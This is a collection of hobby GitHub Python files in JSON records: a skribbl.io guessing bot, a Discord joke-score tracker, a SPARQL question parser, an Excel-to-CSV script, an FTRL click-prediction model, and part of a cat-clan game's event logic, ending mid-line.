+{"seq_id":"19435041462","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport os\nimport time\nimport sys\nfrom threading import Thread\n\ndef try_word(word, known):\n try:\n if len(word) != len(known):\n raise ValueError(\"Word and known aren't the same length!\")\n x = 0\n for char in known:\n if word[x] == char or char == \"*\":\n if x == len(word) - 1:\n elem = driver.find_element_by_id(\"inputChat\")\n elem.clear()\n elem.send_keys(word) \n elem.send_keys(Keys.ENTER)\n time.sleep(1)\n else: \n x += 1\n continue\n else:\n break\n except Exception as e:\n print(e)\n\ndef get_words():\n method = input(\"1: Read words from file | 2: Enter words comma seperated | 3: Use words.txt >\")\n if method == \"1\":\n with open(input(\"Filename >\"), \"r\") as file:\n\t words = file.readlines()\n final_words = []\n for word in words:\n word = word.replace(\"\\n\", \"\")\n final_words.append(word)\n return final_words\n elif method == \"2\":\t\n words = input(\"Enter the words seperatet by \\\",\\\" (no space):\")\n words = words.split(\",\")\n return words\n elif method == \"3\":\n with open(\"words.txt\", \"r\") as file:\n\t words = file.readlines()\n final_words = []\n for word in words:\n word = word.replace(\"\\n\", \"\")\n final_words.append(word)\n return final_words\n else: \n print(\"Invalid input!\")\n return get_words()\n\ndef sort_words(words):\n longest = 0\n for word in words:\n if len(word) > longest:\n longest = len(word)\n all_words = {}\n for leng in range(longest):\n current_words = []\n for word in words:\n if len(word) == leng:\n current_words.append(word)\n all_words[leng] = current_words\n return all_words\n\ndef get_current_word():\n elem = driver.find_element_by_id(\"currentWord\")\n return elem.text\n\ndef get_player():\n players = driver.find_elements_by_class_name(\"player\")\n for player in players:\n info = player.find_elements_by_class_name(\"info\")\n nameElem = info[0].find_elements_by_class_name(\"name\")\n name = nameElem[0].text\n if \"(You)\" in name:\n return player\n\ndef clear_screen():\n # for windows\n if os.name == 'nt':\n _ = os.system('cls')\n # for mac and linux(here, os.name is 'posix')\n else:\n _ = os.system('clear')\n\ndef handleInput():\n global cmd\n global should_print\n global auto\n global clear\n\n while True:\n time.sleep(1)\n inp = input(\"\")\n if inp == \"len\":\n should_print = False\n leng = input(\"Enter the new length >\")\n should_print = True\n cmd = \"len \" + leng\n elif inp == \"quit\":\n cmd = \"quit\"\n sys.exit()\n elif inp == \"known\":\n should_print = False\n known = input(\"Enter what you know >\")\n should_print = True\n cmd = \"known \" + known\n elif inp == \"done\":\n cmd = \"done\"\n elif inp == \"auto\":\n auto = not auto\n elif inp == \"clear\":\n clear = not clear\n else:\n should_print = False\n if auto:\n print(\"Unknown command\\nUse one of these: len quit known done auto clear\")\n else:\n print(\"Unknown command\\nUse one of these: quit auto clear\")\n time.sleep(1)\n should_print = True\n\ndef run():\n global cmd\n global should_print\n global auto\n global done\n global clear\n player = None\n known = \"\"\n leng = 0\n\n while True:\n if leng == 0 and not auto:\n leng = input(\"Enter the length >\")\n known = \"*\" * int(leng)\n elif leng == 0:\n known = get_current_word().replace(\"_\", \"*\")\n leng = len(known)\n\n if player == None:\n player = get_player()\n\n current = 0\n list_len = len(words[int(leng)])\n\n for word in words[int(leng)]:\n current += 1\n\n if auto:\n if player.get_attribute(\"class\") == \"player guessedWord\" and not done:\n cmd = \"done\"\n temp = known\n known = get_current_word().replace(\"_\", \"*\")\n temp2 = leng\n leng = len(known)\n if len(known.replace(\"*\", \"\")) < len(temp.replace(\"*\", \"\")) or temp2 != leng:\n print(\"New word detected, restarting with length \" + str(leng))\n done = False\n break\n\n if cmd != \"\":\n if \"len \" in cmd:\n leng = int(cmd.replace(\"len \", \"\"))\n known = \"*\" * int(leng)\n print(\"Length set successfully\")\n cmd = \"\"\n break\n\n elif cmd == \"quit\":\n sys.exit()\n\n elif \"known\" in cmd:\n known = cmd.replace(\"known \", \"\")\n print(\"Set known to: \" + known)\n cmd = \"\"\n\n elif cmd == \"done\":\n if not auto:\n leng = 0\n else:\n done = True\n print(\"Word found: '\" + lastWord + \"', waiting for it to change...\")\n cmd = \"\"\n break\n\n if should_print and not done:\n if clear:\n clear_screen()\n percent = int(current * 100 / list_len)\n percent_string = \"[ \" + \" \" * (3 - len(str(percent))) + \"\" + str(percent) + \"% ]\"\n progress_bar_string = \"[\" + \"#\" * int(percent / 10) + \" \" * int(10 - int(percent / 10)) + \"]\"\n count_string = \"[ \" + \" \" * (len(str(list_len)) - len(str(current))) + \"\" + str(current) + \" / \" + str(list_len) + \" ]: \" \n print(percent_string + progress_bar_string + count_string + word)\n\n if not done:\n lastWord = word\n try_word(word, known)\n\n if not auto:\n leng = 0\n\ncmd = \"\"\nshould_print = True\nauto = input(\"Start with auto mode? True | False >\")\ndone = False\nclear = False\nwhile (not auto == \"True\") and (not auto == \"False\"):\n auto = input(\"Invalid input. True | False >\")\nwords = sort_words(get_words())\noptions = webdriver.ChromeOptions()\noptions.add_experimental_option('excludeSwitches', ['enable-logging'])\noptions.add_argument(\"--disable-extensions\")\ndriver = webdriver.Chrome(\".\\chromedriver.exe\", options=options)\ndriver.get(\"https://skribbl.io\")\n\ninput_thread = Thread(target=handleInput)\nrun_thread = Thread(target=run)\n\ninput_thread.start()\nrun_thread.start()","repo_name":"GaviTSRA/TSR-Website-Preview","sub_path":"software/skribblbot.py","file_name":"skribblbot.py","file_ext":"py","file_size_in_byte":6964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"38845449417","text":"import os\r\n\r\nimport pandas as pd\r\n\r\nfrom datetime import datetime, timedelta\r\nfrom discord.ext import commands\r\n\r\n\r\nDEFAULT_PATH = \"score_tracker.dat\"\r\nMIN_SCORE = -10\r\nMAX_SCORE = 10\r\n\r\n\r\nclass ScoreTracker(commands.Cog):\r\n \"\"\"\r\n Track T4g1 scores on jokes, provide its current average score as well as\r\n useful statistics\r\n \"\"\"\r\n\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.tracker_user = None\r\n self.history = pd.DataFrame()\r\n self.fix_time = timedelta(\r\n minutes=int(os.getenv(\"SCORE_TRACKER_FIX_TIME\"))\r\n )\r\n\r\n self.load()\r\n\r\n def test(self):\r\n assert (\r\n not os.getenv(\"SCORE_TRACKER_USER\") is None\r\n ), \"SCORE_TRACKER_USER is not defined\"\r\n assert (\r\n not os.getenv(\"SCORE_TRACKER_TARGET\") is None\r\n ), \"SCORE_TRACKER_TARGET is not defined\"\r\n assert (\r\n not os.getenv(\"SCORE_TRACKER_FIX_TIME\") is None\r\n ), \"SCORE_TRACKER_FIX_TIME is not defined\"\r\n\r\n try:\r\n _ = int(os.getenv(\"SCORE_TRACKER_FIX_TIME\"))\r\n except Exception:\r\n self.fail(\"SCORE_TRACKER_FIX_TIME is not a proper integer\")\r\n\r\n def add_score(self, score):\r\n \"\"\"Adds the given score into the data\r\n Expect a sanitized score\r\n \"\"\"\r\n index = len(self.history)\r\n data = self.history.to_dict()\r\n data[\"date\"][index] = datetime.utcnow()\r\n data[\"score\"][index] = score\r\n\r\n print(\"T4g1 got a new score: {}\".format(score))\r\n\r\n self.history = pd.DataFrame.from_dict(data)\r\n\r\n self.persist()\r\n\r\n def remove_last(self):\r\n self.history = self.history[-1]\r\n\r\n self.persist()\r\n\r\n print(\"Score tracker entry removed\")\r\n\r\n def load(self):\r\n \"\"\"Load persisted data from disk\"\"\"\r\n try:\r\n self.history = pd.read_csv(\r\n os.getenv(\"SCORE_TRACKER_PATH\", default=DEFAULT_PATH),\r\n parse_dates=[\"date\"],\r\n )\r\n except FileNotFoundError:\r\n pass\r\n\r\n if len(self.history) == 0:\r\n self.history = pd.DataFrame.from_dict({\"date\": [], \"score\": []})\r\n\r\n self.history.set_index(\"date\")\r\n\r\n print(\"Loaded {} tracking data\".format(len(self.history)))\r\n\r\n def persist(self):\r\n \"\"\"Persist data on disk\"\"\"\r\n self.history.to_csv(\r\n os.getenv(\"SCORE_TRACKER_PATH\", default=DEFAULT_PATH), index=False\r\n )\r\n\r\n def is_in_range(self, value):\r\n \"\"\"Tells if the value is in range\"\"\"\r\n return value >= MIN_SCORE and value <= MAX_SCORE\r\n\r\n async def is_tracker_user(ctx):\r\n return ctx.author == ctx.cog.tracker_user\r\n\r\n @commands.Cog.listener()\r\n async def on_ready(self):\r\n tracker_user_name = os.getenv(\"SCORE_TRACKER_USER\", default=\"\")\r\n self.tracker_user = self.bot.get_guild().get_member_named(\r\n tracker_user_name\r\n )\r\n\r\n tracker_target_name = os.getenv(\"SCORE_TRACKER_TARGET\", default=\"\")\r\n self.tracker_target = self.bot.get_guild().get_member_named(\r\n tracker_target_name\r\n )\r\n\r\n assert (\r\n self.tracker_user\r\n ), \"The privilegied user was not found, check configuration\"\r\n\r\n @commands.command(name=\"savg\")\r\n async def average(self, ctx):\r\n \"\"\"Displays score tracker average score\"\"\"\r\n if len(self.history) <= 0:\r\n return await ctx.send(\r\n \"No score given yet, can't average the void yet\"\r\n )\r\n\r\n avg = self.history[\"score\"].sum() / len(self.history)\r\n\r\n await ctx.send(\"Average score: {:.2f}\".format(avg))\r\n\r\n print(\"Giving score tracking average\")\r\n\r\n @commands.command(name=\"sstats\")\r\n async def stats(self, ctx):\r\n \"\"\"Displays score tracker stats\"\"\"\r\n if len(self.history) <= 0:\r\n return await ctx.send(\"No score given yet, can't stat the void yet\")\r\n\r\n df = self.history\r\n\r\n first_of_month = datetime.utcnow().date().replace(day=1)\r\n first_of_month = datetime.combine(first_of_month, datetime.min.time())\r\n\r\n first_of_year = datetime.utcnow().date().replace(month=1, day=1)\r\n first_of_year = datetime.combine(first_of_year, datetime.min.time())\r\n\r\n this_week = df[\"date\"] >= datetime.utcnow() - timedelta(weeks=1)\r\n this_month = df[\"date\"] >= first_of_month\r\n this_year = df[\"date\"] >= first_of_year\r\n\r\n avg_week = df[this_week][\"score\"].sum() / len(df[this_week])\r\n avg_month = df[this_month][\"score\"].sum() / len(df[this_month])\r\n avg_year = df[this_year][\"score\"].sum() / len(df[this_year])\r\n\r\n await ctx.send(\r\n \"Average this week: {:.2f} month: {:.2f} year: {:.2f}\\n\"\r\n \"This week: max: {}, min: {}\\n\"\r\n \"This month: max: {}, min: {}\\n\"\r\n \"All time: max: {}, min: {}\".format(\r\n avg_week,\r\n avg_month,\r\n avg_year,\r\n df[this_week][\"score\"].max(),\r\n df[this_week][\"score\"].min(),\r\n df[this_month][\"score\"].max(),\r\n df[this_month][\"score\"].min(),\r\n df[\"score\"].max(),\r\n df[\"score\"].min(),\r\n )\r\n )\r\n\r\n print(\"Giving score tracking stats\")\r\n\r\n @commands.command()\r\n @commands.check(is_tracker_user)\r\n async def score(self, ctx, score: int):\r\n \"\"\"[score]/-[score]: Add/remove score\"\"\"\r\n if not self.is_in_range(score):\r\n return await ctx.send(\r\n \"It's not a valid score!\"\r\n \" Range is [{}, {}], you gave {}\".format(\r\n MIN_SCORE, MAX_SCORE, score\r\n )\r\n )\r\n\r\n self.add_score(score)\r\n\r\n if score > 0:\r\n await ctx.send(\"GG {}!\".format(self.tracker_target.mention))\r\n elif score == 0:\r\n await ctx.send(\"Coucou {}!\".format(self.tracker_target.mention))\r\n else:\r\n await ctx.send(\"It's bad {}!\".format(self.tracker_target.mention))\r\n\r\n await self.bot.publish(ctx, \"score_tracker.scored\", score)\r\n\r\n @commands.command()\r\n @commands.check(is_tracker_user)\r\n async def fix(self, ctx, score: int):\r\n \"\"\"[score]: Used to fix the latest score entered\r\n Available during SCORE_TRACKER_CORRECTION_TIME minutes\r\n \"\"\"\r\n if len(self.history) <= 0:\r\n return await ctx.send(\"I have no score to fix!\")\r\n\r\n if datetime.utcnow() - self.history.loc[-1][\"date\"] > self.fix_time:\r\n return await ctx.send(\r\n \"It's too late to go back now, \"\r\n \"you will have to live with that mistake forever\"\r\n )\r\n\r\n if not self.is_in_range(score):\r\n return await ctx.send(\r\n \"It's not a valid score!\"\r\n \" Range is [{}, {}], you gave {}\".format(\r\n MIN_SCORE, MAX_SCORE, score\r\n )\r\n )\r\n\r\n if self.history.loc[-1].score == score:\r\n self.remove_last()\r\n\r\n await ctx.send(\r\n \"Previous score removed! Score was: {}\".format(score)\r\n )\r\n else:\r\n await ctx.send(\r\n \"Score does not match! Score was: {}\".format(\r\n self.history.loc[-1].score\r\n )\r\n )\r\n\r\n @score.error\r\n @fix.error\r\n async def error_handler(self, ctx, error):\r\n if isinstance(error, commands.MissingRequiredArgument):\r\n await ctx.send(\r\n \"The following argument is missing: {}\".format(error.param)\r\n )\r\n\r\n elif isinstance(error, commands.CheckFailure):\r\n await ctx.send(\"You cannot use that command!\")\r\n\r\n elif isinstance(error, commands.BadArgument):\r\n await ctx.send(\"The score need to be an integer\")\r\n\r\n else:\r\n print(\r\n \"Encountered unexpected error: {} {}\".format(error, type(error))\r\n )\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(ScoreTracker(bot))\r\n","repo_name":"T4g1/z14","sub_path":"modules/score_tracker.py","file_name":"score_tracker.py","file_ext":"py","file_size_in_byte":8094,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"74385996968","text":"from nltk.tokenize import word_tokenize\nimport nltk\nfrom nltk.corpus import stopwords\nimport sparql\n\nsearch = raw_input(\"Search:\")\nprocessedWords = []\nwords = nltk.word_tokenize(search)\nsTwords = stopwords.words('english')\n\n#Removing stopwords\nfor word in words:\n if word not in sTwords:\n processedWords.append(word)\n\ntagged_words = nltk.pos_tag(processedWords)\nprint('Searching...')\n\n#Case where was born\nif (tagged_words[0][1] == 'WRB' and tagged_words[0][0] == 'Where' and tagged_words[1][1] == 'VBN'):\n term = ''\n i = 0\n for word in tagged_words:\n if (word[1] == 'NNP'):\n if (i == 0):\n term += word[0]\n else:\n term += ' ' + word[0]\n\n i += 1\n \n sparql.whereWasBorn(term)\n\n#Case who\nif (tagged_words[0][1] == 'WP'):\n name = ''\n i = 0\n for word in tagged_words:\n if (word[1] == 'NNP'):\n if (i == 0):\n name += word[0]\n else:\n name += ' ' + word[0]\n \n i += 1\n sparql.whoIs(name)\n\n#Case where\nif (tagged_words[0][1] == 'WRB'):\n place = ''\n i = 0\n for word in tagged_words:\n if (word[1] != 'WRB' and word[1] != '.'):\n if (i == 0):\n place += word[0]\n else:\n place += ' ' + word[0]\n\n i += 1\n \n sparql.whereIs(place)\n\n#Case what\nif (tagged_words[0][1] == 'WP' and tagged_words[0][0] == 'What'):\n term = ''\n i = 0\n for word in tagged_words:\n if (word[1] != 'WP' and word[1] != '.'):\n if (i == 0):\n term += word[0]\n else:\n term += ' ' + word[0]\n\n i += 1\n \n sparql.whatIs(term)\n\n# case how to cook\nif (tagged_words[0][1] == 'WRB' and tagged_words[0][0] == 'How'):\n term = ''\n i = 0\n for word in tagged_words:\n if (word[1] == 'NNP'):\n if (i == 0):\n term += word[0]\n else:\n term += ' ' + word[0]\n\n i += 1\n \n sparql.howToCook(term)\n\n","repo_name":"Cardoso222/NL2SPARQL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"}
+{"seq_id":"7722725014","text":"# python gencsvs.py \n# run from CMD with anaconda prompt\nimport pandas as pd\n#\ndef g1():\n df = pd.read_excel('covmenu.xlsx', sheet_name='Hoja1')\n #\n df.to_csv(r'covmenu1.csv', index = False, header=True)\n print(\"g1\")\n\ndef g2():\n df = pd.read_excel('covmenu.xlsx', sheet_name='Hoja2')\n #\n df.to_csv(r'covmenu2.csv', index = False, header=True) \n print(\"g1\")\n# - - - - - - - - - - - - - - - - - - - - - \n#\nprint(\"ini\")\ng1()\n# \ng2() \n#\nprint(\"fin\")","repo_name":"DENRIV/PythonFlaskCovXXI","sub_path":"gencsvs.py","file_name":"gencsvs.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"8752820223","text":"from csv import reader\r\nfrom math import exp, sqrt\r\nfrom random import random\r\n\r\nfrom xxhash import xxh64\r\n\r\n\r\ndef data(path, D):\r\n ''' GENERATOR: \r\n Apply hash-trick to the original csv row\r\n and for simplicity, we one-hot-encode everything\r\n\r\n INPUT:\r\n path: path to training or testing file\r\n D: the max index that we can hash to\r\n\r\n YIELDS:\r\n x: a list of hashed and one-hot-encoded 'indices'\r\n we only need the index since all values are either 0 or 1\r\n y: y = 1 if we have a click, else we have y = 0\r\n '''\r\n \r\n with open(path, 'r', encoding='utf-8') as f:\r\n csvreader = reader(f) # create a CSV reader\r\n header = next(csvreader)\r\n for row in csvreader: # iterate over the available rows\r\n row = dict(zip(header, row))\r\n \r\n # ts and bid_id are used only while updating train data\r\n for feat in ['bid_id', 'ts']:\r\n if feat in row:\r\n del row[feat]\r\n \r\n # process clicks\r\n y = 0.\r\n target='click'\r\n if target in row:\r\n if row[target] == '1':\r\n y = 1.\r\n del row[target]\r\n \r\n # build x\r\n x = []\r\n for key in row:\r\n value = row[key]\r\n # one-hot encode everything with hash trick\r\n index = xxh64(key + '_' + value).intdigest() % D\r\n x.append(index)\r\n \r\n yield x, y\r\n\r\n\r\nclass ftrl_proximal(object):\r\n ''' Main algorithm: Follow the regularized leader - proximal\r\n\r\n In short,\r\n this is an adaptive-learning-rate sparse logistic-regression with\r\n efficient L1-L2-regularization\r\n\r\n Reference:\r\n http://www.eecs.tufts.edu/~dsculley/papers/ad-click-prediction.pdf\r\n '''\r\n\r\n def __init__(self, alpha, beta, L1, L2, D, interaction):\r\n # parameters\r\n self.alpha = alpha\r\n self.beta = beta\r\n self.L1 = L1\r\n self.L2 = L2\r\n\r\n # feature related parameters\r\n self.D = D\r\n self.interaction = interaction\r\n\r\n # model\r\n # n: squared sum of past gradients\r\n # z: weights\r\n # w: lazy weights\r\n self.n = [0.] * D\r\n self.z = [random() for k in range(D)] #[0.] * D\r\n self.w = {}\r\n\r\n def _indices(self, x):\r\n ''' A helper generator that yields the indices in x\r\n\r\n The purpose of this generator is to make the following\r\n code a bit cleaner when doing feature interaction.\r\n '''\r\n\r\n # first yield index of the bias term\r\n yield 0\r\n\r\n # then yield the normal indices\r\n for index in x:\r\n yield index\r\n\r\n # now yield interactions (if applicable)\r\n if self.interaction:\r\n D = self.D\r\n L = len(x)\r\n\r\n x = sorted(x)\r\n for i in range(L):\r\n for j in range(i+1, L):\r\n # one-hot encode interactions with hash trick\r\n yield xxh64(str(x[i]) + '_' + str(x[j])).intdigest() % D\r\n\r\n def predict(self, x):\r\n ''' Get probability estimation on x\r\n\r\n INPUT:\r\n x: features\r\n\r\n OUTPUT:\r\n probability of p(y = 1 | x; w)\r\n '''\r\n\r\n # parameters\r\n alpha = self.alpha\r\n beta = self.beta\r\n L1 = self.L1\r\n L2 = self.L2\r\n\r\n # model\r\n n = self.n\r\n z = self.z\r\n w = {}\r\n\r\n # wTx is the inner product of w and x\r\n wTx = 0.\r\n for i in self._indices(x):\r\n sign = -1. if z[i] < 0 else 1. # get sign of z[i]\r\n\r\n # build w on the fly using z and n, hence the name - lazy weights\r\n # we are doing this at prediction instead of update time is because\r\n # this allows us for not storing the complete w\r\n if sign * z[i] <= L1:\r\n # w[i] vanishes due to L1 regularization\r\n w[i] = 0.\r\n else:\r\n # apply prediction time L1, L2 regularization to z and get w\r\n w[i] = round((sign * L1 - z[i]) / ((beta + sqrt(n[i])) / alpha + L2), 5)\r\n\r\n wTx += w[i]\r\n\r\n # cache the current w for update stage\r\n self.w = w\r\n\r\n # bounded sigmoid function, this is the probability estimation\r\n return 1. / (1. + exp(-max(min(wTx, 35.), -35.)))\r\n\r\n def update(self, x, p, y):\r\n ''' Update model using x, p, y\r\n\r\n INPUT:\r\n x: feature, a list of indices\r\n p: click probability prediction of our model\r\n y: answer\r\n\r\n MODIFIES:\r\n self.n: increase by squared gradient\r\n self.z: weights\r\n '''\r\n\r\n # parameter\r\n alpha = self.alpha\r\n\r\n # model\r\n n = self.n\r\n z = self.z\r\n w = self.w\r\n\r\n # gradient under logloss\r\n g = p - y\r\n\r\n # update z and n\r\n for i in self._indices(x):\r\n # if there were too many gradient steps along the feature\r\n # don't do step\r\n if (abs(z[i]) > 10e15)|(n[i] > 10e30):\r\n continue\r\n else:\r\n sigma = (sqrt(n[i] + g * g) - sqrt(n[i])) / alpha\r\n z[i] += g - sigma * w[i]\r\n n[i] += g * g\r\n \r\n def fit(self, path, epoch_num):\r\n ''' Fit model on a bunch of training data\r\n\r\n INPUT:\r\n path: path to training file\r\n epoch_num: number of training epochs\r\n\r\n MODIFIES:\r\n self.n: increase by squared gradient\r\n self.z: weights\r\n '''\r\n for e in range(epoch_num):\r\n for x, y in data(path, self.D): # data is a generator\r\n p = self.predict(x)\r\n self.update(x, p, y)\r\n \r\n def test(self, path):\r\n ''' Get target values and corresponding prediction for a bunch of test data\r\n\r\n INPUT:\r\n path: path to test file\r\n\r\n OUTPUT:\r\n ys: list of target values\r\n preds: list of prediction values\r\n '''\r\n preds = []\r\n ys = []\r\n for x, y in data(path, self.D):\r\n p = self.predict(x)\r\n preds += [p]\r\n ys += [y]\r\n return ys, preds\r\n \r\n def output_weigts(self):\r\n ''' Build the complete weight vector (for following saving)\r\n\r\n OUTPUT:\r\n w: weight vector for logistic regression\r\n '''\r\n alpha = self.alpha\r\n beta = self.beta\r\n L1 = self.L1\r\n L2 = self.L2\r\n \r\n # model\r\n n = self.n\r\n z = self.z\r\n w = {}\r\n for i in range(len(z)):\r\n sign = -1. if z[i] < 0 else 1. # get sign of z[i]\r\n \r\n # build the complete w\r\n if sign * z[i] <= L1:\r\n # w[i] vanishes due to L1 regularization\r\n w[i] = 0.\r\n else:\r\n # apply prediction time L1, L2 regularization to z and get w\r\n w[i] = round((sign * L1 - z[i]) / ((beta + sqrt(n[i])) / alpha + L2), 5)\r\n \r\n return w\r\n \r\n","repo_name":"mkhasykov/for_rtb_pricing_function","sub_path":"xxftrl.py","file_name":"xxftrl.py","file_ext":"py","file_size_in_byte":7372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"18908662368","text":"from .cats import *\nfrom .buttons import *\nfrom .relation_events import * \n\nclass Events(object):\n all_events = {}\n\n def __init__(self, e_type=None, **cats):\n self.e_type = e_type\n self.ID = str(randint(0, 9)) + str(randint(0, 9)) + str(randint(\n 0, 9)) + str(randint(0, 9))\n if e_type is not None:\n self.all_events[self.ID] = self\n self.cats = cats\n self.at_war = False\n self.time_at_war = False\n self.enemy_clan = None\n self.living_cats = 0\n self.new_cat_invited = False\n self.ceremony_accessory = False\n game.switches['pregnancy'] = False\n game.switches['birth_cooldown'] = False\n if game.switches['birth_cooldown']:\n birth_range = randint(6, 9)\n\n def one_moon(self):\n if game.switches['timeskip']:\n game.switches['saved_clan'] = False\n self.living_cats = 0\n self.new_cat_invited = False\n game.patrolled.clear()\n for cat in cat_class.all_cats.copy().values():\n if not cat.dead and not cat.exiled:\n self._extracted_from_one_moon_7(cat)\n elif cat.exiled:\n cat.moons += 1\n if cat.moons == 6:\n cat.age = 'adolescent'\n elif cat.moons == 12:\n cat.age = 'adult'\n elif cat.moons == 100:\n cat.age = 'elder'\n if cat.moons > randint(100, 200):\n if choice([1, 2, 3, 4, 5]) == 1 and cat.dead == False:\n cat.dead = True\n game.cur_events_list.append(f'Rumors reach your clan that the exiled {str(cat.name)} has died recently')\n\n if cat.exiled and cat.status == 'leader' and cat.dead == False and randint(\n 1, 10) == 1:\n game.clan.leader_lives -= 1\n if game.clan.leader_lives <= 0:\n cat.dead = True\n game.cur_events_list.append(f'Rumors reach your clan that the exiled {str(cat.name)} has died recently')\n\n game.clan.leader_lives = 0\n elif cat.exiled and cat.status == 'leader' and cat.dead == False and randint(\n 1, 45) == 1:\n game.clan.leader_lives -= 10\n cat.dead = True\n game.cur_events_list.append(f'Rumors reach your clan that the exiled {str(cat.name)} has died recently')\n\n game.clan.leader_lives = 0\n else:\n cat.dead_for += 1\n\n # interaction here so every cat may have got a new name\n relation_events = Relation_Events()\n cat_list = list(cat_class.all_cats.copy().values())\n random.shuffle(cat_list)\n for cat in cat_list:\n if not cat.dead and not cat.exiled:\n relation_events.create_interaction(cat)\n relation_events.handle_relationships(cat)\n relation_events.check_if_having_kits(cat)\n #relation_events.have_kits(cat)\n cat_class.thoughts()\n self.check_clan_relations()\n game.clan.age += 1\n if game.settings.get(\n 'autosave') is True and game.clan.age % 5 == 0:\n cat_class.json_save_cats()\n game.clan.save_clan()\n game.clan.current_season = game.clan.seasons[game.clan.age % 12]\n game.event_scroll_ct = 0\n has_med = any(\n str(cat.status) in {\"medicine cat\", \"medicine cat apprentice\"}\n and not cat.dead and not cat.exiled\n for cat in cat_class.all_cats.values())\n\n if not has_med:\n game.cur_events_list.insert(\n 0, f\"{game.clan.name}Clan has no medicine cat!\")\n if game.clan.deputy == 0 or game.clan.deputy is None or game.clan.deputy.dead or game.clan.deputy.exiled:\n game.cur_events_list.insert(\n 0, f\"{game.clan.name}Clan has no deputy!\")\n if game.clan.leader.dead or game.clan.leader.exiled:\n game.cur_events_list.insert(\n 0, f\"{game.clan.name}Clan has no leader!\")\n if game.switches['birth_cooldown']:\n birth_range -= 1\n\n game.switches['timeskip'] = False\n\n # TODO Rename this here and in `one_moon`\n def _extracted_from_one_moon_7(self, cat):\n self.living_cats += 1\n cat.in_camp = 1\n self.check_age(cat)\n self.perform_ceremonies(cat)\n if self.new_cat_invited == False or self.living_cats < 10:\n self.invite_new_cats(cat)\n self.other_interactions(cat)\n self.gain_accessories(cat)\n self.gain_scars(cat)\n self.handle_deaths(cat)\n\n def check_clan_relations(self):\n if len(game.clan.all_clans) > 0 and randint(1, 5) == 1:\n war_notice = ''\n for other_clan in game.clan.all_clans:\n if int(other_clan.relations) <= 5:\n if randint(1, 5) == 1 and self.time_at_war > 2:\n self.at_war = False\n self.time_at_war = 0\n other_clan.relations = 10\n game.cur_events_list.append('The war against ' +\n str(other_clan.name) +\n 'Clan has ended')\n elif self.time_at_war == 0:\n game.cur_events_list.append('The war against ' +\n str(other_clan.name) +\n 'Clan has begun')\n self.time_at_war += 1\n else:\n self.enemy_clan = f'{str(other_clan.name)}Clan'\n possible_text = [\n f'War rages between {game.clan.name}Clan and {other_clan.name}Clan',\n f'{other_clan.name}Clan has taken some of {game.clan.name}'\n + \"Clan\\'s territory\",\n f'{game.clan.name}Clan has claimed some of {other_clan.name}'\n + \"Clan\\'s territory\",\n f'{other_clan.name}Clan attempted to break into your camp during the war',\n f'The war against {other_clan.name}Clan continues',\n f'{game.clan.name}Clan is starting to get tired of the war against {other_clan.name}Clan',\n f'{game.clan.name}Clan warriors plan new battle strategies for the war',\n f'{game.clan.name}Clan warriors reinforce the camp walls'\n ]\n if game.clan.medicine_cat is not None:\n possible_text.extend([\n 'The medicine cats worry about having enough herbs to treat their clan\\'s wounds'\n ])\n war_notice = choice(possible_text)\n self.time_at_war += 1\n break\n elif int(other_clan.relations) > 30:\n other_clan.relations = 10\n else:\n self.at_war = False\n if war_notice:\n game.cur_events_list.append(war_notice)\n\n def perform_ceremonies(self, cat):\n if (game.clan.leader.dead or game.clan.leader.exiled\n ) and game.clan.deputy is not None and not game.clan.deputy.dead:\n if game.clan.leader.exiled:\n game.cur_events_list.append(\n str(game.clan.leader.name) + ' was exiled')\n else:\n game.cur_events_list.append(\n str(game.clan.leader.name) +\n ' has lost their last life and has travelled to StarClan')\n game.clan.new_leader(game.clan.deputy)\n game.clan.leader_lives = 9\n game.cur_events_list.append(\n f'{str(game.clan.deputy.name)} has been promoted to the new leader of the clan'\n )\n self.ceremony_accessory = True\n self.gain_accessories(cat)\n game.clan.deputy = None\n if not cat.dead:\n cat.moons += 1\n if cat.status == 'deputy' and game.clan.deputy is None:\n game.clan.deputy = cat\n if cat.moons > cat_class.age_moons[cat.age][1]:\n if cat.age != 'elder':\n cat.age = cat_class.ages[cat_class.ages.index(cat.age) + 1]\n if cat.status == 'kitten' and cat.age == 'adolescent':\n cat.status_change('apprentice')\n game.cur_events_list.append(\n f'{str(cat.name)} has started their apprenticeship')\n self.ceremony_accessory = True\n self.gain_accessories(cat)\n cat.update_mentor()\n elif cat.status == 'apprentice' and cat.age == 'young adult':\n self._extracted_from_perform_ceremonies_19(\n cat, 'warrior', ' has earned their warrior name')\n self.ceremony_accessory = True\n self.gain_accessories(cat)\n elif cat.status == 'medicine cat apprentice' and cat.age == 'young adult':\n self._extracted_from_perform_ceremonies_19(\n cat, 'medicine cat',\n ' has earned their medicine cat name')\n self.ceremony_accessory = True\n self.gain_accessories(cat)\n game.clan.new_medicine_cat(cat)\n elif cat.status == 'deputy' and cat.age == 'elder' and len(\n cat.apprentice) < 1:\n cat.status_change('elder')\n game.clan.deputy = None\n game.cur_events_list.append(\n f'The deputy {str(cat.name)} has retired to the elder den'\n )\n elif cat.status == 'warrior' and cat.age == 'elder' and len(\n cat.apprentice) < 1:\n cat.status_change('elder')\n game.cur_events_list.append(\n f'{str(cat.name)} has retired to the elder den')\n if cat.status in [\n 'warrior', 'deputy'\n ] and cat.age == 'elder' and len(cat.apprentice) < 1:\n cat.status_change('elder')\n if str(cat.status) == 'deputy':\n game.clan.deputy = None\n game.cur_events_list.append(\n f'{str(cat.name)} has retired to the elder den')\n\n # TODO Rename this here and in `perform_ceremonies`\n def _extracted_from_perform_ceremonies_19(self, cat, arg1, arg2):\n cat.status_change(arg1)\n cat.update_mentor()\n game.cur_events_list.append(f'{str(cat.name)}{arg2}')\n\n def gain_accessories(self, cat):\n if cat.accessory is not None:\n return\n name = str(cat.name)\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown = int(len(cat_class.all_cats) / 3)\n while cat == other_cat or other_cat.dead or other_cat.exiled:\n other_cat = 